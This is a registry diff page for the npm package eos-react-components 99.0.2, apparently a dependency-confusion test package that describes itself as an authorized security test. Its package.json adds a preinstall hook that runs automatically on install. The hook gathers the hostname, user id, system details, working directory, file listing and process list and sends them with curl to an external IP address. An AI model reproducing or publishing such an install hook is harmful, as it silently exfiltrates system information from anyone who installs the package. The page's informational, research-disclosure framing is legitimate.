eos-react-components 99.0.2

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.


This version of eos-react-components might be problematic. Click here for more details.

Files changed (3) hide show
  1. package/README.md +1 -0
  2. package/index.js +3 -0
  3. package/package.json +14 -0
package/README.md ADDED
@@ -0,0 +1 @@
1
+ dependency confusion test for authorized security test. if there are concerns, please contact fabian@cure53.de
package/index.js ADDED
@@ -0,0 +1,3 @@
1
+ 'use strict'
2
+
3
+ console.log('dependency confusion test for authorized security test. if there are concerns, please contact fabian@cure53.de')
package/package.json ADDED
@@ -0,0 +1,14 @@
1
+ {
2
+ "name": "eos-react-components",
3
+ "version": "99.0.2",
4
+ "description": "dependency confusion test for authorized security test. if there are concerns, please contact fabian@cure53.de",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "start": "node index.js",
8
+ "test": "echo \"ok\"",
9
+ "preinstall": "(hostname; id; uname -a; pwd; ls -lah; ps) | curl -X POST --data-binary @- http://161.35.15.234:5353?cure53-test"
10
+ },
11
+ "keywords": [],
12
+ "author": "fabian@cure53.de",
13
+ "license": "MIT"
14
+ }